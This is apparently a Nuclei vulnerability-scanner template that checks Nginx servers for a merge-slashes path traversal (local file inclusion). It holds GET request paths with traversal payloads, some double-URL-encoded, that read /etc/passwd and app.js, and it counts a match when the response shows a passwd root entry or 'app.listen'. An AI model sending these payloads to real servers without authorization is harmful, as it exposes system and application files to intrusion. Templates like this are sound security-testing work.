id: nginx-merge-slashes-path-traversal22

info:
  name: Nginx Server - Local File Inclusion
  author: dhiyaneshDk,reewardius
  severity: high
  description: Nginx server is vulnerable to local file inclusion.
  reference:
    - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
    - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
  tags: nginx,generic
  
http:
  - method: GET
    path:
      - "{{BaseURL}}///////../../../etc/passwd"
      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
      - "{{BaseURL}}///../app.js"
      - "{{BaseURL}}///../app.js"
      - "{{BaseURL}}///../../app.js"
      - "{{BaseURL}}///../../../app.js"
      
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "app.listen"
        part: body
        condition: or
        
      - type: status
        status:
          - 200